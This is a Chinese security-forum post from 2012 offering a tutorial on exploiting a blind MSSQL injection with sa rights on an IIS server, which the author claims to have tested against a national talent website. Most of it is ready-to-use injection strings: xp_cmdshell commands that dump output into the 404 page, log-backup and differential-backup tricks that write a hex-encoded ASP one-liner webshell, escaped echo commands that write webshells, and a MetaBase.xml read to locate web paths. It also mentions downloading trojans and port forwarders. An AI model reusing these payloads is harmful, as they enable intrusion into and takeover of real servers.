找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2418|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
5 o# Y5 D0 Y3 k( r& O: X
# ]: z/ B9 h# N6 w: z' N0 \4 w1 R9 v' t
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
" K* s" v, @1 N0 \0 v/ {* _2 G, W4 w  q% \
                                                                 # y: ^4 N  E# U* O+ p* |
                                                                 8 N" V, L: {! @3 R5 T3 O3 Q  D
                                                                  论坛: http://www.90team.net/1 J6 x) Y+ F- I+ Q1 c( @
6 C4 [% T  b" V6 X1 D+ w
2 O1 N6 V! {+ k
9 b+ L3 e8 V8 f
友情检测国家人才网
7 ~+ {4 a- Y6 Y% z' S9 }3 l1 {6 W: h& F, [' T* A' @8 A0 {8 i

6 A3 Y) S! V( l* N" B内容:MSSQL注入SA权限不显错模式下的入侵
; J9 y+ J. t& [& L7 w3 B- }, l4 b8 Q6 K. H
# U# V& J2 p/ @9 H
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。  Q1 A4 ^# d1 G$ x( p$ K
6 q4 t( [# z7 \4 n; `: x
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
. c: R: X6 o9 E1 R& F! D0 K% v$ r5 {: I( Y/ E5 E0 j4 W

$ u, _1 f" A6 T- Y$ S" ]这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。6 G3 n- S1 j6 l; i5 I" y

; x/ u0 Y/ L) q/ K" W思路:
7 X% ?+ R, [  z+ p2 |
8 Y8 ~0 B1 ?5 r1 d首先:
0 s  L8 }; ^# S' z" @
4 ]4 p2 q9 Y: P; W( D7 j' H通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。' k- [: o' {5 A& F% S  @; @

. r& ]  x4 E7 T  n9 S1.日志备份获得Webshell
! ]/ z, ~: ]7 ^. B5 S3 a; Y" Z0 M' p# u
2.数据库差异备份获得Webshell
8 u* n( K9 I) o8 f
" y( U3 m/ s1 }! V4.直接下载免杀远控木马。
) X( v, ~5 b/ V2 O6 j) y
4 O# I2 q7 z& |9 w8 s* F5.直接下载LCX将服务器端口转发出来
* G# K% N/ R( D1 s( U2 `0 @% Y! ^6 y3 P2 s: p; Z1 }9 d+ c5 X& p! X
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
, E% }8 h: X0 h8 t2 L# h4 s( g
0 `: V- R& s; A! b
2 c4 U* @5 q) ]/ }% V7 r! f2 \  S' F2 r, T3 z6 D, @
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, # g# N& F( U6 |6 e6 g

5 z8 o2 ^9 b- ~1 G我直接演示后面一个方法
; s) c  x+ n( O2 D: }& R( d' H$ _( k4 L% X2 C% ^0 \' i) M. `

) [, ~  f% |5 u& O& {分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL , h7 Q2 {* @& d& V5 |: l
6 R# Z: f- \( ?. l; g4 I

6 `/ }- z+ I$ U+ l3 E1 \% J( s  @4 A7 B" O
7 g. [, [" U  J9 x- r7 F- [  x/ v6 A, [
◆日志备份:0 o6 F/ f) Z6 F

( m, I+ q% c: M6 ~# f& m  l
4 o7 r) f$ Q8 Z9 J; i0 u  _1. 进行初始备份
* \5 g) X% o/ M; i1 j. N; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--. @; n, \4 F2 t
: \+ j* c5 K  @, @! c  ]% a0 @# Z& d
2. 插入数据6 Z; ^+ J, k+ q# W$ g$ v3 q3 C( u
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
' k' W! H9 [- T, t+ ~$ J0 ^1 }7 a, v( e9 n* Q) Z/ f
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>) Y5 A/ C" j' c* F' B5 i
  ! A+ }! a8 N( Y4 u: q, `
3. 备份并获得文件,删除临时表
" k6 J  W( |* h8 [5 T;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
- K8 v. w# T1 B" o$ w, s  {9 n* b! F7 I% g, J3 q
7 p9 |7 _  H: E0 z% c# F  D; \
2 _# B5 s4 t8 t  ]# _
◆数据库差异备份3 |" P9 q1 z$ ?: i  `

1 T- M6 k' s; ](1. 进行差异备份准备工作3 c) d! N% d& t, A

. M7 \2 m1 v- V; {, x3 r: N) W;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
4 j& c" E# L% L" C; z/ Q( r+ ^% L7 @; }! G1 Q' ^, i  z4 t
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
& d4 w; }3 O* d
9 y* `; }& g$ f& l. r4 {0 x4 z
6 B. Q( r) i- n6 q(2. 将数据写入到数据库, ?3 v. y! y) o- g
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 9 b) m& p) g4 L7 F( q
. L. C) k$ Z+ i* r
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
* p/ Z1 d0 `1 b& w" x! X# F* h  `, G
3. 备份数据库并清理临时文件
+ D' T) N6 }2 N/ \# T: Y8 [
* a8 B. m# ]% L0 B8 |- B;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--4 o% z+ Z! `' j+ v* x% u

" K( a9 J3 o* s3 Y0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 - Z" S2 o$ ~$ g( G

$ |0 a2 z- h: v( C
  T/ X5 K. R% `5 g" @$ Z7 V3 b: q% `" j0 _" i" J$ W* b& i6 m) z/ j9 x
用^转义字符来写ASP(一句话木马)文件的方法:   
9 y8 f  p" g4 g6 p: ~- t
" f. e; `4 e1 q/ h; Y' J8 F1 R1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--% E, i7 L( v; v
. ~* J, x0 x, d. g0 ^0 X# ?- x
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
6 B* ~, B+ C, s! P7 n' n: {. F' P) {
5 x- U! w; N1 h1 F! ?0 J# s: J: \0 s- a4 ~, k读取IIS配置信息获取web路径
. F) I) H+ W" f; s0 t3 a9 {/ a6 o
/ X, W5 x8 w3 J+ M& R2 H4 V     
2 N; L( ]' f* b. f( I0 Y3 n     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
0 {! K( B: f* j8 o5 t% U( X1 A% y, |# r. M: S
执行命令
; D5 d5 @- I. V4 k9 S, F/ ?     : m- T+ c, B5 U4 [) s! p1 |' e. }* o
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--' }3 `6 }  w7 l7 w0 g

2 I4 @0 O+ n9 o9 T' N
. B7 q; A1 |  M; T  H4 ?; ^4 {+ d5 d# M  Q; i$ F% s* B; r9 [

7 b  P3 H  i$ B0 R) V, z$ b) f5 z3 f  Y: b* F2 Z1 Y

# [* x8 s# l1 D2 r  \% |( L" H: s! G1 A: x( P  E) l$ I1 N/ K* K  A

: x0 f% w" s! z& G% E8 k1 i; m6 Z/ y" k2 l" _; R0 G

, D2 ]$ {6 B8 K" t* y
- X. E/ m! r; d* y6 W# I* \" X. B: E3 l" k& P! E

) Y; ^# Z& m( B! Q; O
, A! U* _8 P- E* e* a- v4 W& q
4 C1 Y2 X  G/ t- I* t! A: R7 U' m* C$ a3 ]+ X1 |9 r; B7 p, e: K: {
  l- e' X& i$ p8 ~

  i$ W7 p8 M3 d( P' A$ e" Q( j, s( t4 Q4 h
2 m0 v% b0 _7 ]& N! n
. m: K" `* z: K2 f2 e
# F8 w+ q; q- A( d- X/ }

) q2 A1 I- L2 w# I3 L
; {( ~  j- |5 b3 {8 [; G) \/ W$ {5 c/ x/ R/ d2 i
; J4 [% a+ e6 L+ v' o( m
. Y5 _+ s1 O- T: t1 L/ S3 d% A2 ~

) A: J9 L4 x! q; G: }+ p: e: C. M2 X) j% A1 @# O8 j
9 `" F( u+ T; x' B' I

$ k7 K. p# R2 D/ `2 k. J/ q( J, U! G1 z+ V  n1 V
% j, q" |) {6 l- y4 W6 h

2 M" |9 e2 s0 b  P$ \2 P7 Q! Y! z; c+ C$ V% x
$ m% Z9 ~+ y1 z& C. X: u9 S
7 K) {1 n6 k& ^

" o% f3 k& f& }6 u0 [: J! j. \- O! h: k. b" [

  r# q( j% E) ]1 D! p3 L, [9 I$ c3 b) a8 \" w: {

. m$ ]- g+ f' j7 B! x$ w$ J/ F+ y3 j" e( v( \
( Q9 W. }: R1 O. ^2 S, s3 l

7 K" V% R( U9 S( p1 P
/ S2 u9 Q: q: D5 _8 C$ @/ p1 B3 W0 H! n- G/ Z/ p2 F& o1 S: w
8 C: w4 s6 \0 u: v9 ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表